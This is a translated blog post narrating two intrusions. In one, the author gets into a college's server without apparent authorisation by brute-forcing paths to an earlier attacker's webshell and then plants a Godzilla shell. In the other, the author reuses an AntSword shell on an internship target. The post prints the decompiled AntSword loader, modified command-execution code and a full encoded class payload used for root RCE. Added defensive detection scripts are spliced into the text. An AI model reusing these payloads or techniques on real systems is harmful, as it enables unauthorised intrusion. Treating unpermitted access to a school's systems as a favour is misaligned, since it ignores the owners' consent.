Two Unconventional Routes to Getting Access

Preface

In early May someone asked me to check whether the college she was transferring to (the junior-college-to-bachelor track) had any vulnerabilities, and at the end of May someone else asked me to look at a site his internship company had assigned him to test. So here is a record of the unusual way access was obtained in both cases.

Getting access

Helping a girl get access to her school

One night in early May a girl messaged me asking how to get past the change-password page. The page appears after logging in with the initial password and forces you to set a new password that meets the complexity policy.

Testing the reset flow showed that it sends you back to the login page rather than to the admin home page, so there was no bypass by editing keywords in the response or by going straight to the admin home URL.

At that age it is normal to be unable to sleep at night, so I took a look at the school for her.

Information gathering

She gave me some information about the school (staff IDs and the general situation), and I wondered whether I could get access to one of its sites; after all, a security-services grunt who can't get a shell is not a good one.

During reconnaissance I found a site that looked like it could be compromised.

A site that looked like it could be getshelled

But testing showed there was no upload vulnerability here.

While analysing the JavaScript, however, I found an image-management endpoint.

It lets you preview some of the images that have been uploaded to the site.

Finding traces of an earlier intrusion

It also turned up files that looked like webshells.

The intrusions dated mainly to the middle of last year and the start of this year.

In one of the images I found webshell code (by the time of writing this differs from what I saw during testing, because some of the webshells found earlier had already been deleted).

So a bold guess: a reasonably skilled attacker had already taken control of this site.

Analysing the path files land in after upload

From this analysis, a successfully uploaded file is stored on the server at /uploadfiles/<file extension>/<year-month>/<day>/<file name>

So there might well be a jsp or jspx shell sitting on the server.
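From the defender's side, that same layout is what you would walk when hunting for leftover shells. The script below is an added example of mine, not the author's code or anything from the site: it assumes the /uploadfiles/<ext>/<yyyyMM>/<dd>/<name> layout described above and flags files with an executable JSP extension, files whose content contains JSP markup regardless of extension (a shell hidden behind a .jpg name), and files outside the expected layout. It builds its own constructed sample tree in a temporary directory so it runs offline.

```python
import re
import tempfile
from pathlib import Path

# Extensions a servlet container will execute if the file is reachable under the web root.
EXECUTABLE_EXT = {".jsp", ".jspx", ".jspf"}
# Content signatures of JSP scriptlets and JSPX documents; a shell stored under an
# image name still has to contain one of these to be executed.
JSP_MARKERS = re.compile(rb"<%|<jsp:root|<jsp:scriptlet|<jsp:directive", re.IGNORECASE)
# The layout described above: <ext>/<yyyyMM>/<dd>/<file name>
PATH_RE = re.compile(r"^(?P<ext>[^/]+)/(?P<ym>\d{6})/(?P<day>\d{2})/(?P<name>[^/]+)$")


def inspect_upload_tree(root):
    """Walk an upload directory and return the files that warrant a look, as dicts
    with the relative path, (year-month, day) taken from the directory layout,
    and the reasons they were flagged."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*"), key=lambda p: p.as_posix()):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        layout = PATH_RE.match(rel)
        reasons = []
        if path.suffix.lower() in EXECUTABLE_EXT:
            reasons.append("executable-extension")
        try:
            head = path.read_bytes()[:4096]
        except OSError:
            head = b""
        if JSP_MARKERS.search(head):
            reasons.append("jsp-content")
        if layout is None:
            reasons.append("unexpected-layout")
        if reasons:
            when = (layout.group("ym"), layout.group("day")) if layout else None
            findings.append({"path": rel, "when": when, "reasons": reasons})
    return findings


def build_sample_tree():
    """Create a constructed upload tree in a temp dir (sample data, not from the page)."""
    root = Path(tempfile.mkdtemp(prefix="uploadfiles-"))
    samples = {
        # an ordinary image: JPEG header, nothing else
        "jpg/202205/10/a.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32,
        # image name, but a JSP scriptlet inside
        "jpg/202201/03/b.jpg": b"GIF89a\n<% /* scriptlet body omitted in this sample */ %>",
        # an executable extension directory, as found on the page
        "jspx/202106/15/1234.jspx": b'<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="2.0"/>',
        # outside the expected layout entirely
        "readme.txt": b"upload area",
    }
    for rel, content in samples.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(content)
    return str(root)


if __name__ == "__main__":
    for f in inspect_upload_tree(build_sample_tree()):
        print(f["path"], f["when"], ", ".join(f["reasons"]))
```

Run against a real upload root, the "when" tuple is what tells you which backup or log window to pull; the content check is what catches the polyglot case where a shell was stored under an image extension and the container was later configured to serve it.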

Working out the webshell's path

So I requested these two targets directly:
http://x.x.x.x/uploadfiles/jsp
http://x.x.x.x/uploadfiles/jspx

A jspx directory existed, which means a jspx webshell had at some point been uploaded to this site.

Next I used Burp to brute-force the date components, then the shell's file name.

The date range to brute-force should be 2020 to 2022.

Brute-forcing found the year and month the webshell was uploaded.

Continuing, it found the day.

That left only the webshell's file name; I brute-forced 1-9999 and left it to luck.

Emmm, I shouldn't have blurred the earlier screenshots.

Unexpectedly, a jspx turned up.

Successfully got a shell for her

Searched GitHub directly for this title.

I'll just post the chat screenshots with her instead.

I then told her that the edu platform's history of vulnerability submissions for this school showed no high-severity getshell vulnerability at that point in time, so this was a backdoor: uploaded maliciously and never reported.

Using the cmd shell I wrote a Godzilla (哥斯拉) shell, connected directly, and found that many shells already existed.

Finally, I hope she succeeds in upgrading to the bachelor's programme.

Helping a guy get access to a site

On Monday, after finishing an attack-and-defence exercise, a fellow practitioner messaged me asking me to look at a site; I had nothing to do back at the hotel, so I took a look.

The target had been assigned to him by his internship company, with a restriction: no uploading shells. They gave him a hint of an account name but no password.

Information gathering

No password, so I looked at the login form and login flow. It had a captcha, so I couldn't be bothered brute-forcing; I tried the usual weak passwords and got nowhere.

Analysing the site structure

While analysing the site's JavaScript I found an upload endpoint.

I tried it; it wouldn't even accept a txt file, so it was unusable.

I kept looking for endpoints and found an attachment-management endpoint, which I accessed directly.

Finding historical webshells

After opening the endpoint I searched for jsp to see whether any odd jsp files had been uploaded as attachments, and found files that looked like webshells.

And there were 6/2 = 3 of them.

I discussed it with him at this point.

Now I needed a way to read the code of these three shells.

I then found there was also a file-download endpoint.

I crafted the request directly, using the fileid from the attachment-management endpoint to fetch the webshell's contents.

The first jsp seemed useless.

The second shell

I hadn't seen it before; a Baidu search showed it was an AntSword (蚁剑) shell (don't you find those two characters especially hard to type?).

Tried a direct connection.

The connection was reset, so I thought of sending the command-execution code directly.

Trying command execution

Since AntSword could not connect directly to the target's webshell, I instead connected to a shell that AntSword can connect to normally.

Take that data, url-decode it, then base64-decode it, and write the result out as a bytecode class file.


Write it out to a class file:

```bash
echo 数据 |base64 -d > 1.class
```

Then decompile 1.class with IDEA.

The code is as follows:

```java
package com.test;

import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

// Decompiled from 1.class: the AntSword JSP loader stage. The JSP stub on the server
// defines this class from the base64 "passwd" parameter and calls equals() on it.
public class Info {
    public HttpServletRequest request = null;
    public HttpServletResponse response = null;
    public String encoder = "base64";
    public String cs = "UTF8";
    public String randomPrefix = "2";
    public String decoderClassdata;

    public Info() {
    }

    // Entry point. Reads the encoder class from the request, runs SysInfoCode()
    // and writes the result between two fixed markers.
    public boolean equals(Object var1) {
        this.parseObj(var1);
        StringBuffer var2 = new StringBuffer();
        String var3 = "4c6d80d6c63e";   // response prefix marker
        String var4 = "1c0ffed1";       // response suffix marker
        String var5 = "vfc5430a64bb6";  // request parameter holding the encoder class

        try {
            this.response.setContentType("text/html");
            this.request.setCharacterEncoding(this.cs);
            this.response.setCharacterEncoding(this.cs);
            this.decoderClassdata = this.decode(this.request.getParameter(var5));
            var2.append(this.SysInfoCode());
        } catch (Exception var8) {
            var2.append("ERROR:// " + var8.toString());
        }

        try {
            this.response.getWriter().print(var3 + this.asoutput(var2.toString()) + var4);
        } catch (Exception var7) {
        }

        return true;
    }

    // Connection test: working directory, web root, OS name and the account the server runs as.
    String SysInfoCode() {
        String var1 = System.getProperty("user.dir");
        String var2 = System.getProperty("os.name");
        String var3 = System.getProperty("user.name");
        String var4 = this.WwwRootPathCode(var1);
        return var1 + "\t" + var4 + "\t" + var2 + "\t" + var3;
    }

    // "/" on Unix-like systems; the drive letters (e.g. "C:") on Windows.
    String WwwRootPathCode(String var1) {
        StringBuilder var2 = new StringBuilder();
        if (!var1.startsWith("/")) {
            try {
                File[] var3 = File.listRoots();
                File[] var4 = var3;
                int var5 = var3.length;

                for(int var6 = 0; var6 < var5; ++var6) {
                    File var7 = var4[var6];
                    var2.append(var7.toString(), 0, 2);
                }
            } catch (Exception var8) {
                var2.append("/");
            }
        } else {
            var2.append("/");
        }

        return var2.toString();
    }

    // Recover request/response from whatever the JSP stub passed in: an Object[] pair,
    // a PageContext, or a bare HttpServletRequest.
    public void parseObj(Object var1) {
        if (var1.getClass().isArray()) {
            Object[] var2 = (Object[])((Object[])var1);
            this.request = (HttpServletRequest)var2[0];
            this.response = (HttpServletResponse)var2[1];
        } else {
            try {
                Class var9 = Class.forName("javax.servlet.jsp.PageContext");
                this.request = (HttpServletRequest)var9.getDeclaredMethod("getRequest").invoke(var1);
                this.response = (HttpServletResponse)var9.getDeclaredMethod("getResponse").invoke(var1);
            } catch (Exception var8) {
                if (var1 instanceof HttpServletRequest) {
                    this.request = (HttpServletRequest)var1;

                    try {
                        Field var3 = this.request.getClass().getDeclaredField("request");
                        var3.setAccessible(true);
                        HttpServletRequest var4 = (HttpServletRequest)var3.get(this.request);
                        Field var5 = var4.getClass().getDeclaredField("response");
                        var5.setAccessible(true);
                        this.response = (HttpServletResponse)var5.get(var4);
                    } catch (Exception var7) {
                        try {
                            this.response = (HttpServletResponse)this.request.getClass().getDeclaredMethod("getResponse").invoke(var1);
                        } catch (Exception var6) {
                        }
                    }
                }
            }
        }

    }

    // Output encoder: defineClass() the client-supplied class and let it transform the
    // result; falls back to returning the plain text if that fails.
    public String asoutput(String var1) {
        try {
            byte[] var2 = this.Base64DecodeToByte(this.decoderClassdata);
            Method var3 = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
            var3.setAccessible(true);
            Class var4 = (Class)var3.invoke(this.getClass().getClassLoader(), var2, 0, var2.length);
            return var4.getConstructor(String.class).newInstance(var1).toString();
        } catch (Exception var5) {
            return var1;
        }
    }

    // Strip randomPrefix (here 2) junk characters, then base64-decode.
    String decode(String var1) throws Exception {
        boolean var2 = false;

        try {
            int var5 = Integer.parseInt(this.randomPrefix);
            var1 = var1.substring(var5);
        } catch (Exception var4) {
            var2 = false;
        }

        return this.encoder.equals("base64") ? new String(this.Base64DecodeToByte(var1), this.cs) : var1;
    }

    // Base64 via reflection so the same class works on Java 8 and on 9+.
    public byte[] Base64DecodeToByte(String var1) {
        Object var2 = null;
        String var3 = System.getProperty("java.version");

        try {
            Class var4;
            byte[] var7;
            if (var3.compareTo("1.9") >= 0) {
                var4 = Class.forName("java.util.Base64");
                Object var5 = var4.getMethod("getDecoder").invoke((Object)null);
                var7 = (byte[])((byte[])var5.getClass().getMethod("decode", String.class).invoke(var5, var1));
            } else {
                var4 = Class.forName("sun.misc.BASE64Decoder");
                var7 = (byte[])((byte[])var4.getMethod("decodeBuffer", String.class).invoke(var4.newInstance(), var1));
            }

            return var7;
        } catch (Exception var6) {
            return new byte[0];
        }
    }
}
```
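For a defender, the decompiled loader also gives the indicators needed to recognise this traffic. The script below is an added example of mine, not the author's code and not part of AntSword: it reverses the loader's decode() (url-decode, strip the two-character randomPrefix, base64-decode) and checks for the class-file magic bytes, scans a form-encoded request body for any parameter that carries a Java class file behind a short junk prefix, and pulls the SysInfoCode() reply out from between the response markers. The marker and parameter values are the ones in this decompiled sample (AntSword generates them per shell, so they are indicators for this sample, not universal signatures); the request body and response it parses are constructed.

```python
import base64
import struct
import urllib.parse

# Values taken from the decompiled loader above; per-shell, not universal.
RESP_PREFIX = "4c6d80d6c63e"          # var3: written before the output
RESP_SUFFIX = "1c0ffed1"              # var4: written after the output
PARAM_NAME = "vfc5430a64bb6"          # var5: parameter carrying the encoder class
RANDOM_PREFIX_LEN = 2                 # randomPrefix = "2": junk chars before the base64

CLASS_MAGIC = b"\xca\xfe\xba\xbe"     # every Java class file starts with this


def decode_class_param(raw_value):
    """Mirror the loader's decode(): url-decode, drop the random prefix, base64-decode.
    Returns b'' when the remainder is not valid base64."""
    value = urllib.parse.unquote_plus(raw_value)[RANDOM_PREFIX_LEN:]
    try:
        return base64.b64decode(value, validate=True)
    except ValueError:          # binascii.Error is a ValueError
        return b""


def class_file_info(blob):
    """Return (major, minor) class-file version if blob looks like a class file, else None."""
    if len(blob) < 8 or blob[:4] != CLASS_MAGIC:
        return None
    minor, major = struct.unpack(">HH", blob[4:8])
    return major, minor


def find_class_payloads(body, max_prefix=4):
    """Scan a form-encoded request body for parameters whose value, after stripping
    0..max_prefix junk characters, base64-decodes to a Java class file.
    Returns [(param_name, prefix_len, (major, minor)), ...]."""
    hits = []
    for name, value in urllib.parse.parse_qsl(body, keep_blank_values=True):
        for skip in range(max_prefix + 1):
            try:
                blob = base64.b64decode(value[skip:], validate=True)
            except ValueError:
                continue
            info = class_file_info(blob)
            if info is not None:
                hits.append((name, skip, info))
                break
    return hits


def extract_framed_output(response_body):
    """Return the text the loader wrote between its prefix and suffix markers, or None."""
    start = response_body.find(RESP_PREFIX)
    if start < 0:
        return None
    start += len(RESP_PREFIX)
    end = response_body.find(RESP_SUFFIX, start)
    return None if end < 0 else response_body[start:end]


def parse_sysinfo(text):
    """Split SysInfoCode()'s tab-separated reply: user.dir, web root, os.name, user.name."""
    parts = text.split("\t")
    if len(parts) != 4:
        return None
    return dict(zip(("cwd", "webroot", "os", "user"), parts))


# Constructed sample traffic (not captured from the page's target).
SAMPLE_CLASS = CLASS_MAGIC + struct.pack(">HH", 0, 52) + b"\x00\x10\x01\x00\x04Info"
SAMPLE_RESPONSE = RESP_PREFIX + "/opt/app\t/\tLinux\ttomcat" + RESP_SUFFIX


def build_sample_request():
    """Return (form body, raw url-encoded parameter value) shaped the way the loader expects."""
    prefixed = "xz" + base64.b64encode(SAMPLE_CLASS).decode()
    body = urllib.parse.urlencode({PARAM_NAME: prefixed, "other": "hello"})
    return body, urllib.parse.quote(prefixed, safe="")


if __name__ == "__main__":
    body, raw = build_sample_request()
    print(find_class_payloads(body))
    print(class_file_info(decode_class_param(raw)))
    print(parse_sysinfo(extract_framed_output(SAMPLE_RESPONSE)))
```

The generic check in find_class_payloads is the one worth keeping in a WAF or log-review rule: a POST parameter that base64-decodes to CAFEBABE after a few junk characters is a class file being handed to a defineClass() loader, whichever client generated the names. Note that asoutput() can wrap the reply in a client-supplied encoder class, so the marker-based extraction only applies when the output is sent in the clear, as it was here.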

Analysing the code is a bit of a hassle, so I went straight for a spot where command output is echoed back.

There is this method, used for testing the connection: it returns the current user directory, the operating system type, and the user the server runs as.

That makes it simple: replace the body of SysInfoCode with command-execution code.

```java
// Replacement for SysInfoCode(): run the command and return its output so it is
// echoed back through the existing response path. equals() already catches Exception,
// so declaring IOException here is compatible with the caller.
String SysInfoCode() throws IOException {
    Process p = Runtime.getRuntime().exec("whoami");
    InputStream ins = p.getInputStream();
    StringBuilder stringBuilder = new StringBuilder();
    String line = null;
    InputStreamReader inputStreamReader = new InputStreamReader(ins);
    BufferedReader bufferedReader = new BufferedReader(inputStreamReader);
    while ((line = bufferedReader.readLine()) != null) {
        stringBuilder.append(line).append("\n");
    }
    return stringBuilder.toString();
}
```

Then compile it to a bytecode class file.

Then base64-encode Info.class.

Then url-encode the data and send the request.

Successfully got root on the site.

Running the id command:

passwd=yv66vgAAADQBUgoAPgCvCQBhALAJAGEAsQgAsgkAYQCzCAC0CQBhALUIALYJAGEAtwoAYQC4BwC5CgALAK8IALoIALsIALwIAL0LADgAvgsANwC%2FCwA4AL8LADcAwAoAYQDBCQBhAMIKAGEAwwoACwDEBwDFBwDGCgAaAK8IAMcKABoAyAoAGQDJCgAaAMkLADgAygoACwDJCgBhAMsKAMwAzQoAzgDPCADQCgDOANEKANIA0wcA1AoAKADVBwDWCgAqANcKACoA2AgA2QgA2ggA2woATgDcCgDdAN4KAN0AyQoAGgDfCgA%2BAOAKADwA4QcAoQcA4gcA4wgA5AoAPADlCADmBwDnCgA8AOgHAOkKAOoA6wgA7AgAYgoAPADtCgDuAO8KAO4A8AgAZAoAYQDxBwDyCADzBwCmCQD0APUKAOoA7woAPAD2CgD0APcHAPgKADwA%2BQoA%2BgD7CgA%2BAMkKAPQA%2FAoATgD9CgBOAP4KAE4A%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%2BAAAABgABAGIAYwAAAAEAZABlAAAAAQBmAGcAAAABAGgAZwAAAAEAaQBnAAAAAQBqAGcAAAAIAAEAawBsAAEAbQAAAGMAAgABAAAAISq3AAEqAbUAAioBtQADKhIEtQAFKhIGtQAHKhIItQAJsQAAAAIAbgAAAB4ABwAAABEABAAKAAkACwAOAAwAFAANABoADgAgABIAbwAAAAwAAQAAACEAcABxAAAAAQByAHMAAQBtAAABiwAEAAcAAACrKiu2AAq7AAtZtwAMTRINThIOOgQSDzoFKrQAAxIQuQARAgAqtAACKrQAB7kAEgIAKrQAAyq0AAe5ABMCACoqKrQAAhkFuQAUAgC2ABW1ABYsKrYAF7YAGFenACE6Biy7ABpZtwAbEhy2AB0ZBrYAHrYAHbYAH7YAGFcqtAADuQAgAQC7ABpZtwAbLbYAHSostgAhtgAitgAdGQS2AB22AB%2B2ACOnAAU6BgSsAAIAGABZAFwAGQB6AKQApwAZAAMAbgAAAEYAEQAAABUABQAWAA0AFwAQABgAFAAZABgAHAAjAB0AMAAeAD0AHwBQACAAWQAjAFwAIQBeACIAegAmAKQAKACnACcAqQAqAG8AAABIAAcAXgAcAHQAdQAGAAAAqwBwAHEAAAAAAKsAdgB3AAEADQCeAHgAeQACABAAmwB6AGcAAwAUAJcAewBnAAQAGACTAHwAZwAFAH0AAAAkAAT%2FAFwABgcAfgcAfwcAgAcAgQcAgQcAgQABBwCCHWwHAIIBAAAAgwCEAAIAbQAAAQ8AAwAHAAAAZLgAJBIltgAmTCu2ACdNuwAaWbcAG04BOgS7AChZLLcAKToFuwAqWRkFtwArOgYZBrYALFk6BMYAEi0ZBLYAHRIttgAdV6f%2F6bsAGlm3ABsSLrYAHS22AB%2B2AB0SLrYAHbYAH7AAAAADAG4AAAAmAAkAAAAzAAkANAAOADUAFgA2ABkANwAjADgALgA5ADkAOgBIADwAbwAAAEgABwAAAGQAcABxAAAACQBbAIUAhgABAA4AVgCHAIgAAgAWAE4AiQCKAAMAGQBLAIsAZwAEACMAQQCMAI0ABQAuADYAjgCPAAYAfQAAAB8AAv8ALgAHBwB%2BBwCQBwCRBwCSBwCBBwCTBwCUAAAZAJUAAAAEAAEAlgAAAJcAmAABAG0AAAFJAAQACAAAAFm7ABpZtwAbTSsSL7YAMJoAP7gAMU4tOgQtvjYFAzYGFQYVBaIAHBkEFQYyOgcsGQe2ADIDBbYAM1eEBgGn%2F%2BOnABVOLBIvtgAdV6cACiwSL7YAHVcstgAfsAABABEAPwBCABkAAwBuAAAAPgAPAAAAQAAIAEEAEQBDABUARAAYAEUAHABHACYASAAtAEkAOQBHAD8ATQBCAEsAQwBMAEoATQBNAE8AVA
BSAG8AAABcAAkALQAMAJkAmgAHAB8AIACbAJwABgAVACoAegCdAAMAGAAnAHsAnQAEABwAIwB8AJwABQBDAAcAdAB1AAMAAABZAHAAcQAAAAAAWQB2AGcAAQAIAFEAeACKAAIAfQAAADAABf8AHwAHBwB%2BBwCBBwCSBwCeBwCeAQEAAP8AHwADBwB%2BBwCBBwCSAABCBwCCCgYAAQCfAKAAAQBtAAACBgAEAAYAAADfK7YANLYANZkAJSvAADbAADbAADZNKiwDMsAAN7UAAiosBDLAADi1AAOnALUSObgAOk0qLBI7A70APLYAPSsDvQA%2BtgA%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%2BBwB%2FBwCCAAEHAIL%2FACIABAcAfgcAfwcAggcAggABBwCC%2BQABAAEApQCYAAEAbQAAAPwABgAFAAAAcioqtAAWtgBGTRJHEkgGvQA8WQMSSVNZBLIASlNZBbIASlO2AD1OLQS2AEstKrYANLYATAa9AD5ZAyxTWQQDuABNU1kFLL64AE1TtgA%2FwAA8OgQZBAS9ADxZAxJOU7YATwS9AD5ZAytTtgBQtgBRsE0rsAABAAAAbgBvABkAAwBuAAAAHgAHAAAAeAAJAHkAJgB6ACsAewBSAHwAbwB9AHAAfgBvAAAAPgAGAAkAZgB4AKYAAgAmAEkAegCnAAMAUgAdAHsAowAEAHAAAgB8AHUAAgAAAHIAcABxAAAAAAByAHYAZwABAH0AAAAIAAH3AG8HAIIAAACoAJgAAgBtAAAAyAAEAAQAAAA3Az0qtAAJuABSPisdtgBTTKcABk4DPSq0AAUSBLYAVJkAFrsATlkqK7YARiq0AAe3AFWnAAQrsAABAAIAEAATABkAAwBuAAAAHgAHAAAAgwACAIYACgCHABAAigATAIgAFACJABYAjABvAAAANAAFAAoABgB8AJwAAwAUAAIAewB1AAMAAAA3AHAAcQAAAAAANwB2AGcAAQACADUAeACpAAIAfQAAABkABP8AEwADBwB%2BBwCBAQABBwCCAh5ABwCBAJUAAAAEAAEAGQABAKoAqwABAG0AAAF%2BAAYABwAAAJYBTRJWuABXTi0SWLYAWZsATRJauAA6OgQZBBJbA70APLYAXAEDvQA%2BtgA%2FOgYZBrYANBJdBL0APFkDEk5TtgBcGQYEvQA%2BWQMrU7YAP8AAScAAScAASToFpwA1El64ADo6BBkEEl8EvQA8WQMSTlO2AFwZBLYAYAS9AD5ZAytTtgA%2FwABJwABJwABJOgUZBbA6BAO8CLAAAQAIAI8AkAAZAAMAbgAAADIADAAAAJAAAgCRAAgAlgARAJcAGACYAC0AmQBYAJoAWwCbAGIAnACNAJ8AkACgAJIAoQBvAAAAZgAKAC0AKwB8AHcABgAYAEMAewCjAAQAWAADAJkApgAFAGIALgB7AKMABACNAAMAmQCmAAUAkgAEAJsAdQAEAAAAlgBwAHEAAAAAAJYAdgBnAAEAAgCUAHgAdwACAAgAjgB6AGcAAwB9AAAAKgAD%2FQBbBwB%2FBwCB%2FQAxBwCsBwBJ%2FwACAAQHAH4HAIEHAH8HAIEAAQcAggABAK0AAAACAK4%3D

Finally I told him: RCE achieved.

Summary

Getting access does not have to go through open ports, weak passwords, RCE, file upload, injection, phishing and the like. Information gathering can also turn up historical webshell backdoors that give you access.

That said, this approach is expensive and not recommended; treat it only as a line of thinking.

Author: jdr
Link: https://jdr2021.github.io/2022/06/01/两次非常规方式获取权限之旅/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.